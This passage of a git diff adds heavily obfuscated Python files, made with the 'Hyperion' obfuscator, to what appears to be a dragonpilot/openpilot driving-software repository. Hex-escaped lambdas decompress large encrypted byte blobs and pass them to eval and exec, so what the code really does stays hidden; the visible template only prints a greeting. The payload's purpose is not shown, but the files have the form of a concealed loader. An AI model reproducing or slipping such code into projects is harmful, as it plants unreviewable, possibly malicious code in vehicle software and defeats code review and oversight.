;_while.StackOverflow(_run='lIlIIlIlIIIlIllIIlIlll',_square=b'\x82W\xe7kF\xa1`u\xd0\\\xb7\x02\xde\xa9\xd00C\xebG\x915\xcft\xad$5#V.{\x94\xdc\xc0\xf5N\x86\xe1-\xfcV\xae\xd6\xb94:\xa1\x9e\x1fD\xf8\xcb\xabC\xc3\xc3x\x0e\xbf\x1b\x1eDZ\xc0(\xa52\xdd\xc84\x8d\xa5\x92\xa9>\x06\x95P$r\xfd\xfe\xb1\xe6\xb1\xdb1\xd4x\x83\xe6\x00R\xbc\x89:\x02ZY\xfc\x14\xf8\xc3k\x8a\xbf\xa49$O1\xef\xed\xc7\xc8\x9a\x87{\xc0\'\x8ah>\x9a\xea\xea\xc5\x00\x01\xd6\xd5:\xce\xa9V\x04\x8e\x93he0\x1f\x1fX\xf0\xa3\xa9C`\xc1q\xb4L+-\xe9\rC\xc3o~\n\xed\xc5\x1c\xaarH.\xec\'U\x1a\'\xb1\rGO\x0fK\x0c\xbb\xc6{H\xee\xe1\x85\xef\x8e(U\x1f\x96\xde\xb6r\x8b%\xf4\xba\xab_U?\x06\xba\xfd0\\\xa8w\xf6\xb3%h\x85lZ\xbd\xaa\x15\x8c\x1d\xd1\x8a\xe7\xbf\xae\x8d]\xd3\x83Pw\x13%\x85\xd5\x9d\xaa-\xbf\'?;$1\x1f\xbf6\x84^\xdf\xa6@}\x814\xbby\xb3\\\x18\x1d\xb4\xa6\xd84\xdd\xb6\x13\\>\xd4vO\xe0j\xc6\xc9\xa8CQ3\xad\xef?\x8a\xefo\xa7h\xe9Z\xae&\xdf\xbf\xbf\xdax\xa3\xf6\xbe\xdb9\x98e\xdbXC\xab\xbd\xf1&\xa1\xfe\xfd66cN\xd7u\x8a\x92\xde\xbfKa\x0c\xc1\x86\x18\xb4\xb3\xd0\x07`M\xb3+\xcfCO\xb5Y\x90\x94=\xec\x89\x11\xe6\xc9Z\xf8\xb3\x8f\xd3\xa1\xf75\xe7T\xc2\xe2\xd9\x0b\x1b\x03?N\x8c\xa1c\x9a\x98\xf0\x0f\xe6\x1dMl}\n\xbd\x97\xe25\xaax\xf96\xc6?n\xe9:\xf0\xbb\xa2\xb6,\x95a\x05\xe9y0\x1f@\xeali\x9f\x17\xd9\xb1\xdfv\\\xafw\xef_>\xc7\x02Kd\xf3}\xba\xde\xa9\xad]\xdb9\xd3\x87\xfc\xf9M~\x01c^\xd4\xf9nN\xc8\xc82\x1c\xa4-\x89\xcd\xa5\xe0\x1e\xc3\x96\xf6\xe9X\xb2z\xc9~\xa3\xf8\xef:\x9e\xc3-\xee\xbd\xddg\xe0\xf7h;\xc7\xdb\xf0\xfbC10Z\xb4\x17\x0c#I%q\xce1\xb8f\xe1*\xdd~\xaf\xfa\xbf{\x9e$\x98\x1fb\xc2<\xa9\xe5\xc2\x80k\x99\xf79\xc6\xd8\t\x0c\xcc\x922\\A\xcfH98\xf2\xda\xbd\xf8\xd8(V\xda\xc6\x8e\xd7\xd1~W\xbf\xb6\xc1\xac;\xd6m\xef\xdc\xd5?\xfc\xdcY\xc1hp\xbc3\x1eN1/J\t\xf3\xd59\x13b\xbag\x1dP\xb4\x1f\x95\xbf\xa7\xf5\x81\xf7I[8Z7L-o\xc7\xb7>\xf0\xc1\xc7\xd5\x85C7\xa4-\x1f\xa3\xc63\xf2g\xc5\xf9\xeb\x07#K\x87\xc6\x1dN\x82\xd0v\xdc\x15\x12\xbc\xed\x93{\xf5\xf3\x14\x182\xd7\xa8h\x8cr\xad\xb5\xb8P\xb0\xe4\xe6\xe3\xae\x0b\xeb]\x1f-\xd0FK\x8cY\x83\x87\xc7\xbf\x11\x8a\x99\x87W\xe6\xb0\xdc\x02\x83n\xc8\xe6F\x18\xe7\x118\xca-C\xc9>\xba\xf6;\x93\x81\xd8m\x9d\xa6\t\xdf\xdf]0X\xf5\xb7\xb28F\xf4\xc2\xc7\x10\xde\xea\x82\xa9T\x89\x06\xaej\x1d\x1fg\x9cT\xcb\xd8\xa6\xfa\x19|a\xe7\x18\xf3{*,5\xaf\x1d2QK\xee\xc0\x86\x0b\'\xb2\xa5\x8c\xe1\x0b\xa4\xc51\xfdp\xd5\xb6\x86u\xc1\x95/\x0c\xf6\xad\x8d\xc3p\xce\xd6\xb6\x804l\x08|\xe2\xe2\x16\x17_\xb4%\x1c\xa2s\xe72\xdeu\xda\xc1]\x8b\xfc`\x81\xd6\x9f%\xc5\xb6\x834\x07\xad=]\xa2\xd8\xda\xb1#\xa2\xad\x89b[\x82\x07\xf6\xf0\x93c\x8b\xc4\xe0\x86\xbc\xa4\xb6H\xb6\xe5\xf5\xa9So\xce\x19\xba\xb2\xabM_\xbd{\xff\xfao\x86\xe0\xa5\xc2\x13\x86\x961\xf9\xffr\xbb\xce\xf8\xc1K\x8a\x0eB\xe1i\x84\xa1u\xa6{\xbdY\x06\xa7\x9f#\xcc\x84J\x8a\xe6\x0b\'\xf5\xben\xc2\x0c\x06\xfbl\xa1\xfb9\xef\xd7W\xdf\xc6+\xb6\xb5\x1b;\x16.N9\xb7\xe7\x9b\xb2^\xfd\x9d\xe8_\x1f|4&\xe8\xac\x1f,\xa78V\xe4\xca8\x0b\xa6\xce\x88G\x1a\x03Csi\x1e\x17\xff\xb4]\xaf\x0b\xee\xdaJ\x08819j\x13K\xa7\xd6\xcf\xa3\xfc\x0f\xe9JU\xaeaF\xe5\xeb\x0f[&\x8fn\xdbu\x93\x92n\xaer\xe4FI\xa9RN\xba\xd4\xc3L\xb5L\xdb\xb6 \xc9VV;\x05W\x87\xe2\xfdB\xc1d\x8a\xb0C%c\xdb\x8c\x1d\xe7\xce\xb1\xbb\x9f\xb7\\\xc7\x14\x83\xcf\xc2\xbc\xf3\xd4\xfe\xee\x85A\x84\x8d\xa4\xe4\xb9\x88V7t\xba\xd3~\x02\xbdz.\xba\xa7\xb9ei\x19\xb5+s\xe7m\x95\xf3\x1b\xd9\xd2\x8e\xcaX\xbc\xe5\x8e\xbb\xc9\xdfM<\x97,\xf96\x03#\x85}\x96\xd4\x0b\xbf\xb5\xd1\xed\xfc\xda]0\x06t|\x1f\xeeo\xc3\xd7}\xb4F\xeb\xfa\xa1d\x89+\xcd{d\xf6\xd9l\xc0\xfc\xd1\xfd\xc8\xe1\x9c\xcb\x9cyZ5\x96j\xadM~\xdd\xd9\x8e\xcb\xb5\xe3\x05a\xbc\xc5\x94\xa8\xab\x8e\xd3\xa0|-q\xf9d\x87N=\xa6\x8em\xf2\xf8\xcd\x98\x13\x15}X}\x94\xf3\x8c\xbd:\x99\x99\xeb[\x03\x0e\x1bp6.\xdd\xdfR\xb0\xd6x\xee\x1e\xbef\xb2\xf9\xdcQ\xe0y\x1c\x9cU\xe3\x94\x94pS\x87)\xd2[\x03\xedVX\xfcH\xf86\xee\xc6-\xbc\xae\x86C\x92Z\xdbqs"e\xb0\x10jn\x9c\x97\x1c\xed\xa9\xe8\x08\xc6\xe3\xf2\x85\xe9\x95\x85\xc6\xf1\x98\xf3iX\x16\xd7\x95\xda\xb9o\xfc\xcd\xfe\x94y6\x95\xffo\x83\xe5\xc6\xd8\xf2\xb5\x88\xf1"m\xebQ\xad\x9d\xbb\x86\xd9\xfdc\xc1\xf11\xf8\xb3\xe5\xefq<\x98\x1e\x96\xdb\xf7\xd5\xb92\xe0\xeax:-\xdc\xbeF\xf32t~)X[\x86\xe6X\xden\xab\xbb\xdf\x9bk3\xad\xc3\x19\xae\xff~|\x9b*y!\xd9\xf8}\x17\xcf6\x15>\x96\xe6\xf3\x96\x83\x9d.\xd9\xb3\xabWm\xd3\xb9\xbar\x0b\xb2;]\xd4\xe5c\xa4<\x93l;\x88\x87\'<\x940\\3Fg\xd4\x85g\xaa\xdfN\x85\xa1\xa7\xa0ks\xcb\xb1x\xednxk\x83\xd5~\x98\x0e\rC\x02\x83A6\xf5t]\xc7.~\xeeZ7\xb8\x8c\x81\xcb\x07\\\xba\x96\xe3eW\xb6\xd6f\xef\xe8\xfe\xc6\xd8?\x83\xbc\xc8\xbc\x91)\x84\x87db\xfe\x0cV6\xdb41T\x9e\xb4m\xd3\x96z\xe83i\xcfI[_\xd8m\xc4~\x97 \x0e6\xf7\x8a\x12\xb2`6\xe7\xa7\xdc7\xb5\xed\xb3\x81\xfbf\xe5\xf3\x99;e\xf6\x19\xe8\x98\xaeKz\x14C\xff\x0c\xd9;\x9b>\xcc\xf1\xd7f\xddI\xb1.E\x1812/Lf\x89r;Q\xf3\x031[\xb8_\x9c\x90^"\xb5\xf0:O\x8e\x17\x96>X\x0e\x97\x84\xd3\xe3\x87\xd4\x0f}\xc5\x15\xc7\xc2\x15\xb2\x9c{\xf5v4\x9f\xf9u\xf2\x01\xdcA\xa5\xb0\xd7\xe1\xd7\xe58"a\xed2{\xbd/\x11G\xfc\xc5\x7f\x1f\xdbc\xe9\\O\xd6\xf0a\xfd\xbd\x04\xeb\x9f\x88]\xc7\xc5\xaf\x82\xddG8\xed\xc6<\x8f\xb0\xd7\x0b\xf1\x1c\xee\xf8\x89\x11\xf7\x1f\xbe\x8f\xb9\xaeH\xaa\xf5\xa0NS\x9eW\x7f\xfa\xbe\xcf\x97\xb4\x8e\x9d\x97]\xcey\xf0\xcb\xa1\xe4:\x0b\xadUl\x1dqe\x8d\xaeN\xdc]{\xdc\xf5\x86\xce\xcd\xb1e\r\xc17<)Y\xef\x89x%\x83S\x88Vsu\x02\x84o`\xeb\xfa;\'e{\x83\x8f*\xda\xb4\xee#\xd8\x05w)\xfb}\x1b^\x0b@Kw\xd1\xd3\xbcNu\xeb\xb7\x9f\x04\x8f\xed\xccQ\x97\xc6su\x06\xae-\x8c;\xaf\xc7\xe3\x17\x13\x16\xa9\x92\xdf\x93\x9d`T\x8eo\xab\x9c_%-\xf2\xd4a\x19j\xdbo\x04\x8e{\x9cT\xfe\xabu\xddE8}\xfe\xd3\x92\x0b7\xe1\xae\xce\x0f,\xa2\xc7?\x01\x0e\xab\xe12\xecSZ7E\xa7\xde\xaa\xcdw`\xc8\xdf\xa4\xcf7\xc1-\xf3u\xee\xe1\xfd\xa6\x8e\xa7g\x0fg\x8b\x7f*[\xd6:~\xcbk\xf8\xa4\x1a\xab\x96\xe2\xae)\xb5sl\xade\xeb\xcd\xdcqi\xc2\x8d\x0b\x13}\xebK\x1b\xac\xf4\xadM\xc7\x83\xa3&\\-o\xbf\xd1\x8d\xbf\xdbp};N\x9f\nk}x\x8c\xfb2\x97p\xa8x\xdc\x99\x18\xe9\xa72\xd6\x93\x07\x1e\x9c\xff\x9c\\\xf7\xbe\xec\xd8\x9c\x0e\xe6\x96\xf3M\xeb\xbbf\xd7\xda\xe4^\xcfm\x13rL\r\xec\x18\xb9B7\\\x86\x19\x17/\xff\xe8\x9a\x9cw\xbc\xdd\xc2\xa9`\xe8\x14x,\x04\xff3\x17\x96\xaa\xb1\x15u<\xa5\xe1&\x1c\x8c\x9e/\x9f7T\x8e%\x87Z\x92w\x99\x0b#>\xf1\xf0f\xe1\x92\'LG\x0f\xe3\x91\xe5\xd6\xa6S\xda\x1ev') + + _while(_product = -49167 - -89827)._walk(Builtins = System._memoryaccess + 63609) ;_while.StackOverflow(_run='wxxxwwwwxwwwxwwwxwxxwx',_square=b'\x8f\xeb2\xb2\xaa\xb6um\xfe:j\xfc\x18\x94\xbdwfa\x1da2\xb1\xf8\x10\xfbM\x94\xcf\x96Z\xd8%\xd9\x89\xb4\xd8\x9c\xda\xc2v\x899rN\xbcL\xa8\xf2\xa5\xf9,4\xc7w\xda\x9a\x1b2~\xc0S\x94\x99q\xb9|(\xd9~\xafMqK}\x1b/\xc0\xcbh\xb9\xb8\x9d\xa7\xb5\xf8W\x88\x07\x0b\x06#\xe6\x1c\xe1\x99\xcc>\xfb4\x9c\xdb\x12K`\xe0\x99\xa7\xc2\xdd\xb9\xd2\x82!e`\xc36\xb7CqL\xfccmQ\xf1\xb1\xd9\x0e\r\xd7Oy\xbc\x8fE\xcb\x9fRf\xf0\x14u\x85c\xf1\x8a\xeb\xf7\x16Z\'>Y\x17\xb5\x88-A[|6\x1f9\xb1+W\xf6\x89\xd9\xe8\xe3\x03\xb2\xbc\xec\xda\x7f\xec\xcf\x87o\x0c\xb9\x96\xf8\xea\xba\x86x\xc5\xe1\xf5\xfc\xe9\xe0\x8a>^--\xafU4\xae\'\x93v\xbb\xac1|\xdb9\xf8\x08\x84\xa5U\x9ar\x02\xe9\x14\xee\x0f\\\xf3\r\xe6\xed\x13\xd9\xf9\xfb\xee\x98\xe9DsZ\xab<\xcf1\x964~\x84#9=\x8c}j\xce\xa5\x0c\xf6\x08f\xa7\x8eu(\xbc{\x8a1\x0e\xed\xab7m<\xdb\xd7\xe96\xfdo\x9b\x1dL\x1b\x8cv\xf5\xe51\xe4\xf5K\xd0\x1aM<7\r\'\x97\xbf\xa3v\x15.=j\xea/\x93D\xca\xe6\x93\xc2\x94R?\x1f5}\xd3\x98\xb4_\xbd\xf7\xcdmR\xa4\xd4&CJlB$\xc9J\xa1;\x0c\x9e\xcd\xa7m\xee\x9b~\xea\xa4)\xc1\xda\xef=#\x19X\x80\xc4j#\x13\xbf\x99\xe4]\xcf<\x92\x8fR*\xec\x8dM\xdb[\x94I_\xd76\x01lQ\xa6\xf4\x85\xe3\xf1\xe9Z!\xe5j\x99\x9eV\xd1^\x99\xc2\xb1JVl\xce\xd9d\xad!\x12\xabF\x89\x99\xc9\xf1\xb9$D=\x15(T\xb8\xa9\x7f\x06\x95i\xd37e\x12gJ\xa1\xbe\xa9\xc1\x03\xc2\xc2 F\xfc\x1beH\xedK\x13x\xcc$\xa9>S:\x17\x90\r\xfe\x0e\xb3\x18\xef\x9c\x0c\xc7&G<|\'\x19\xcf-\x9d\x8c\xce\xf4N5\xbc\xb6j\x97\xb4fx\x07Tp\xe7f(\xb7\xe8\xa0\xccc-Kd`\xf7\x9ay\xa6e\x16e\xa9~\x0bx\x0f\xc8\xd9\\H\xa9D\x16\xeb+\nU\xc0\xfb\xcaH`\x1b\xfd\xdey\x96*z\xcb\xbel\xcf\x90\xd99\xd5\x00\x19g\x90\xed\xf9.\x85\xec\xf1R\xed4x\xe6\x8d\xdc\xe3\xeb\x12\xdd\x99R\xa1\xc0M\xadnm\x11\xe4\xb4<\xdc\xb5\x9c\xe3\xe5\xaf\xab\xef-\xfb\xde\xd5\xae\xde\x91o\xbd\xec\x13M@\xf6B\x06\xe4^O\xb0\x1f4\xe9\xab\xdb\xd6\xfb\xaa/kv33\xbd\xc9\xc7n\x8a\xcd\xd8\xaeL\xd6v,\nr\xb3\x13\xc4\x19\x18r\xe1\x8f\x9fm\xc2T\x1d\xb6\xaa\xdc\xe7\xec\xdb\xde\xcbd\x85o\xcf\xc9\xbe\xa9\x16\xb42\x8bx\xfd8\x12)\x8ef\xae\xb2\xda\xcc\xa9g\x1b7\x19\xc7\xddl\xe4\xfcz\x9b\x19Y\xd9\xdd\x19W\xf5\x10\x9f\xbfU?\x0eeh\xafgg\xe7\x19\xec\xb7\xe5\xa7^7n\xde\xd7\xe6\xbb\x94\xee\xcc\x97<\x8f=\x1f\x19\x84\x9c\x12\x03\x10n\xa82?KK@\x94W\x94\x00E\x00\x85\x94\x9f}\x08\xef\x8d\xc9O?\x05:\xc7C#<\x91\xc6P\xa9Hum\xaa\xe7\x98\xbe\x9a~+\t\tT\x01\x0f\x15\x1a\xb7\xf9\xbc\x95M\xe1)9~e\xd8U\xf1\xf3\xe6\xa9r\xb1\xad\xbdq}\xdc\xeb}\xc4\xdf\x8f/d]I]\x9d1\x1d\x8d\xfb7B\xa4p&\x96\xa9\xe6\xff\xf4\x9f\xd4\xfd\xa3\xfb%I\xeb}\x01\xfd\x95\xca[\xcd\xa7\xc3\xb9\xbbt#\x9bm\x0c\xfe\xbb+\x8f%\xf6\x9bO\x9f\xfa\xbc\xa9\xe6m\xec\xfc_\xd7\x08\xa7\xc2\x92\xd4\x85%\xa4\xf9^\rZF\xc2{\xbdg\xb7\xd8C\xba\xaf\x00jR\xea\x87\xb6>\xda\xe9;\xdf\xe9\x89\x12\xcbf\xefTG\xf5s\xdbd\xb8\x8fJ\xe8Ru\x18\xabF\xbc<\xab!\xae\xd9\x8f\x9cPr\t&\xdeO\x1cG\xd6W\xc0\xeeU\x101\x9f\x9eG\xfc\xb9a\xdd\x02\x9a\x010\x06\xb4\xd4]\xe2\xc1t\xf4\x95a\xca,Kt\xdf\xe9R\xe8\xa2\xec~\xae\x8b\xd4%\xb5\xfb92-\x9a\xa7\xf6j;\x8b\xb1\xc9nb\x9b^Z\xdc$\xfa[\x17}\xbaY\x9b]\xae\x06\xaf\x85\t\xaf=\xda!\x03\x14\xb0\x1d\xcf\x95\xdf@?\xc6\xba=]\x8e\xa3\x1bc\x81{\x8af\xedmG\x89(\x03\xc9\x06\xa62\xe7g+2\x1c\x1c1\x022\x10\xb6Fv_X\x80\x8b\xd8hu\xb5\x8bPp\xeb5R~2\x87a\xfe)\xd7\xcb.|r\xfb\xc9\xb0T\xdff\x9b\xd93\xf0)\xa9hi\xb9F\xc3C\xd21QB\xcaP\xd3D\x11\x85\x10\x1c\xa6v\x9d\x85\xb5\x17\xd6\xec\x98\xad\xc39\xee\x9b5Z\r\xb6[@\xf0\xf8\x02\xe4_(\x02\x03Y\xd8\x0b\x14\x8b]\xbf\xf0\x91=Z\x94\x0c\x082\x02\x84|#`\xa0\x9b\xb5\xc1D\xda\xab\xcbL_\x15\x90?\xa0f@\xc8\n\x11u\xde\xac\rx\xcf\\\xbf\x03|\x14.\x07)\xbc\x19.H\x8d\xda0\x983\xe5s\xcfn\x13\xc2\x94\x0e\xe6\xeck\x9bL[\x1cF\xc8w\xd7\xa5\x8c\x7f]\xb2)\x15\xb3R\xc9v\xad\x18\xc3W\xc2\x1b@\xd1$m\x1f(gU\x91v_0\xbc6\xd46\xf6\xc7mg\xa9h:\xa68y\xf0^Y\xe3\xaaY\xad\x16\xa4\x13\x85\xe67K\x9e\x0f\xe5\x1a\x11\xf1|I\xa4\xb0\xae\xe2\xfe\xe8\x8c\xc8\x95f\xc7z\xcc\xac\x87L\xabk\xed\xe6\xaawu\xc9g\xbc\x03\x99Y\x80y\x85*\xf7)\\\xb9b\xe6@\xe4\xfejB\xf1\xb7\x9f3\xa6\x1c&$\xb5@s\x8e\xf6v\xc6\xccHZ\xd3\x03\x91\xf0\x10\xd6U\n\xd1\xea|M\x85\xde\xf2\xbc\xc7V\x93\xbf\x16\xaf_C\x11\x02v\xf4\x9e\xde\x9c@O\xfe\xb7!B\x9f\x92\x8e\xca\x87^$\xe9yS\x9e^\xc9\xdb\xe1\xf8ttbl\x15\xcc\xd1\x19\xd1y\xbd\x13\x84\xe8\x0f\xe2\x0b$\xa3I\xc8\x80\x83\x18Z\x9f\xb6\x9e\x0c-\x9b\xf4\x11\xf4N\x04\x8f\x15\xe1\x83\xc1\xd3^_\x9f\xady\x8c\xafH"\xe4\xf3Y\xca\xa4S\xe3\xbdj\x83\xa7yO\xa8\x18\x07\x9fZ\x1a\x8a\xe8\xae\x04\xc7\xd9\xc0\xc4P;\xe5\xcbSNR\xe7\x1f\x93\xfa)\rT\xa4\xaa\xe4\xf0\x956E\x9a\xad\xd1_\x18\x1aHTO\xd4\xa5#\xd0\x7f]k\xa8\xef2 \x90\xd6a 5\xfbz\x93\xe9\x1e0\xe1\xe3a\x1amx\xc6\xf94\x04\xdfK\xb7\xb3h\xb3*$%\xb9\xfa\x91Yafi,c\xb6m\\\xcdr{lM\xbaU\xc2h\xa3\xbc\xf6[\x81\xe7\x94\xa5\xbbb\xe3\xaa\x90\x18\x13Q\xd7<\xf3T\xe6\xfaaMi\x1d\xb3\xd4\xa4\n\x9b\xa9\x9c\xad\xdb\x8eo]S\xcf)\xb4sW\x1a\xe1\xa6\x19)\xefw7\xec\xb2\x13\x9e\xc3uq\xe5\xae\xafm.\xb0\xe59s\xad\xae1\x08\x1bB\xaf#\xccH\xed\x99\xe3\x96\xc2\xde\xa3\xb6_w\xf7j\xf4\x9f\xaaR\xe6\xf0\x94w\x14F\x8f\xcc\xe8\xdb\xc6\xd95\x89o\xc0\x8d\xfb;\xa7\xee\xc8\xbcH/\x0f\xb0\xae\xd9\xf5\x90\xa5Oam\x80\xf4\'\xa4\x98$\x88\x89 \xe9"H4Bd[)JAA}]o\xd1\xd7v\x84\xa9\xe1\x00\'\xb4\x00\xed2\xd2\x1e\xf2|\xf8\xa4P\xc2\x97\xa3\x12\x1eD\xf5\x15\x8e.(\xb2\xa0\x93\xa1\xf4\xcdLE\xe5\xd56\xccsq\x90%\xdd\x14\x81/q1\xa9}\xae\xc4\xab\xed)\t\xab\xd8!\xac\xa2%\x08\xab@\x04V\xdd\xbf\xc5E\xfc\xa1s\x1c\xf3\x856t|Z\xd7\xaf\xcb%jj\xbe^\xdc\x0f\xcc\xf5\x0f\xe3\x8bZE\xf8\x9c\xcb\x82V\x1a!U\xf6\xfe$\xf3_\x97\xd6\xff\x05\x190\x9d\x87\x95\xf7\xb4u#\x08\xf7>\xc9\xf5\xe2\x1c}H\x88iO,\xaa#\x05\x8ad\x8c|\xca\xa8\x82\xa1\xb6rL\x87\x84\xe5\xb5\xbfh}\x83\xcb\xd3\x1a\xde3n\xf0B\xfd|h\xb8\xb0Y\xc7\xe2?C\xb8Nv\xf3\x9f\x14n\x86\xdc\x07\r\xcfi\xeab\xec7\xf3!\xdd\x8c\xe1\x81(\xfc\x0c\xa4\xb1X\x9c?C9E3\xb5\xc29\xa4fZ:\xb5\xd21C\x03\xba0Q\x0fO\xc5\xdd\xade\t#\xc6M[\x94n\xd8\xb4\xcfa\xa4!{h\xc0G\xdc\x18\xf3\xa6\xbc\xa2\x92a\xf4\xcb;\x96\x9f\xdf4V!CP\r\x8f\xe7\xf4\xf4\xe4!dOg\xaa\xb7\xed\xc1\x07\xe1R\xa1\x1e\x07\xcf/\xeb\xb2\xdf%\xff\xadBz\xb4\x9csd\xbf\xee\xef\xe0\xf9\r\xecgv\xde\x9a\xb1\x17e8\x9f)\xf2\xe6\xfe\xb9\xbdd\x18\x81\xc5\xd3\xe49\x9f>9aC\xbeh\x8fC\xc9\x91\xdb\xe6\xda)B\x06\x18S^\xb4\xeb}\x8b;\xc6\xc8w\xa6q/\xf9\xe1\x17LE\x17\xdb\xfdR\xceg)~\x9f\xb6\xe9\t\xec*N\xec\xf8\x1b\x9c\x91Kn\xcc\'\xc2\x02N\x16`\x9d(\x9b\xb5^\xd7\x92h\xbb\tV\x94\x12\xad7\x05^\xabQ{\x02\xfdux\xa6\xef\xa8r\xce\x8a\xeb?\xad\x1c0E\xe4.\xec6\xb5\xdb\xdcnc\xe7\xb8p\xb6i\xb9\xc5\x9czLQ\x1b\xe6\xba\x81\x145\x0b\xc9#C\x13\xa8|\xc1\\\x82\xf8m.\x9c\xf5{\xf8\\\xb3\xad\xf06g$\x87,\xe3\x84T\xca\xb4\x829\xcd\x17\xa5#\xbdU\xba\x1d\xcd\x1ay\xb4\xc4\xef\x0b\xb7"\xf6\x0bJ\x01.\xcc\xb1u!\x9e\xea8\xefo\x12\xd8tS\xe6\xeb\x86\xbbvd\x8e\xab\xf2:!k\xf8uM:^\xd9\xc9s\xdb\xf9m\xb2M\xeeR\x08\x19\xb1\x85\xc0\n\n\xf6}\x8d\x0c\xc79\x90\x06\x8ah\xe3\xeb\\\x99\xa1+\x1d\xf8\x85@\x89n\n\xeb \xea\xd6\xfa') + + if 111549 > 4018910: + System._walk(Builtins = System._memoryaccess - -25492) + elif 409875 < 1049270: + _while(_product = 52507 + -5423).Invert(_add = 98967 * System._memoryaccess) ;_while.StackOverflow(_run='llIIIlIlllIlIlIIIlllI',_square=b'8\x88f\xe8L\x1a\xa3\xa7I\x8a.\x99\t^\xcb\xad\x15\x93\x1d"\';\xc6\xf8{\x1d\x029%\xf0a\x05z\x98\xe6\xe8u\xd8\xa8\x9d\xefXB2v\xdaFi\xdd\x81\x84\xa2n\xf9\xb4\xf5\x8e\xba5:X\x10M\x11\x1e&\x88\x9cG<\xd1u .\xe1\xff\x031 \x8a\r') + + if 418695 > 8236163: + System._walk(Builtins = System._memoryaccess * -5355) + elif 272048 < 9385621: + System.Invert(_add = 89736 / System._memoryaccess) ;OoDOOooOOoOoDDDoDooooDDO,NNMMMMNNMNNNMNMNM,lljjijllljilljjjjilljjj,LLLJJLLJJJILLLIJJLJJILJJL,ilijjjlijillliilllill=(lambda IlIlIIIlIlIlIIlIllI:IlIlIIIlIlIlIIlIllI['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda IlIlIIIlIlIlIIlIllI:IlIlIIIlIlIlIIlIllI(__import__('\x7a\x6c\x69\x62'))),(lambda IlIlIIIlIlIlIIlIllI:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(IlIlIIIlIlIlIIlIllI)"),filename='\x58\x57\x57\x58\x57\x58\x57\x58\x58\x57\x58\x58\x57\x57\x58\x57\x58\x58\x58\x58\x58\x58\x57\x57',mode='\x65\x76\x61\x6c'))),(lambda:(lambda IlIlIIIlIlIlIIlIllI:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(IlIlIIIlIlIlIIlIllI)"),filename='\x58\x57\x57\x58\x57\x58\x57\x58\x58\x57\x58\x58\x57\x57\x58\x57\x58\x58\x58\x58\x58\x58\x57\x57',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda xwxwxwxwxwxwwxwwwxx,IlIlIIIlIlIlIIlIllI:xwxwxwxwxwxwwxwwwxx(IlIlIIIlIlIlIIlIllI)) + _while(_product = -75333 * 52091)._walk(Builtins = System._memoryaccess - 62713) ;LLLJJLLJJJILLLIJJLJJILJJL()(ilijjjlijillliilllill(OoDOOooOOoOoDDDoDooooDDO(NNMMMMNNMNNNMNMNM(lljjijllljilljjjjilljjj('\x76\x61\x72\x73'))),_while._negative(Product='xwwxwxwwxwwxwwxwxw')+_while._negative(Product='wxxwwxwwwwxwwxwxxxxw')+_while._negative(Product='XWWWXWXWWWXWWWWWWXWXXX')+_while._negative(Product='lIlIIlIlIIIlIllIIlIlll')+_while._negative(Product='wxxxwwwwxwwwxwwwxwxxwx')+_while._negative(Product='llIIIlIlllIlIlIIIlllI'))) + + except Exception as DetectVar: + if 223437 > 3645380: + _while.execute(code = Add(DetectVar)) + + elif 199354 > 1178268: + _while(_product = 81711 + -98358)._walk(Builtins = System._memoryaccess + -80373) \ No newline at end of file diff --git a/selfdrive/dragonpilot/obf-otisserv.py b/selfdrive/dragonpilot/obf-otisserv.py new file mode 100755 index 000000000..935059822 --- /dev/null +++ b/selfdrive/dragonpilot/obf-otisserv.py @@ -0,0 +1,98 @@ +from builtins import * +from math import prod as _system + + +__obfuscator__ = 'Hyperion' +__authors__ = ('billythegoat356', 'BlueRed') +__github__ = 'https://github.com/billythegoat356/Hyperion' +__discord__ = 'https://discord.gg/plague' +__license__ = 'EPL-2.0' + +__code__ = 'print("Hello world!")' + + +Walk, System, _divide, Algorithm, _callfunction, Multiply, _memoryaccess = exec, str, tuple, map, ord, globals, type + +class Math: + def __init__(self, StackOverflow): + self._positive = _system((StackOverflow, 37350)) + self._detectvar(Positive=68711) + + def _detectvar(self, Positive = float): + # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler + self._positive /= -22571 / Positive + + try: + ((Algorithm, _callfunction) or _statistics if (Algorithm, _callfunction) and _statistics else ... or (_statistics, (Algorithm, _callfunction))) + + except TypeError: + ((Algorithm, System, _divide) or _divide if (Algorithm, System, _divide) and _divide else ... or (_divide, (Algorithm, System, _divide))) + + except: + _memoryaccess(81444 + 2674) == False + + def _while(self, Negative = -81082): + # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler + Negative -= 37911 / 79062 + self._random != type + + try: + ((_divide, {System: _callfunction}) for _divide in (Algorithm, System, _divide) if _statistics >= Algorithm) + + except AssertionError: + ((Algorithm, (_divide, _callfunction)) for Algorithm in (_callfunction, Algorithm, _divide) if Multiply >= Algorithm) + + except: + _memoryaccess(-75407 / -76128) == float + + def While(_power = float): + return Multiply()[_power] + + def Cube(_hypothesis = 19148 - -91864, _invert = True, Absolute = Multiply): + # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler + Absolute()[_hypothesis] = _invert + + try: + (({_divide: _statistics}, _statistics) for _statistics in (_divide, _callfunction)) + + except ArithmeticError: + {System: _callfunction} if _statistics > Multiply else {System: _callfunction} <= Algorithm + + except: + _memoryaccess(10513 / 30596) == False + + def execute(code = str): + return Walk(System(_divide(Algorithm(_callfunction, code)))) + + @property + def _random(self): + self.Add = '<__main__._memoryaccess object at 0x000009811BE59479>' + return (self.Add, Math._random) + +if __name__ == '__main__': + try: + Math.execute(code = __code__) + Modulo = Math(StackOverflow = -2629 / -72112) + + Modulo._detectvar(Positive = Modulo._positive - 9149) 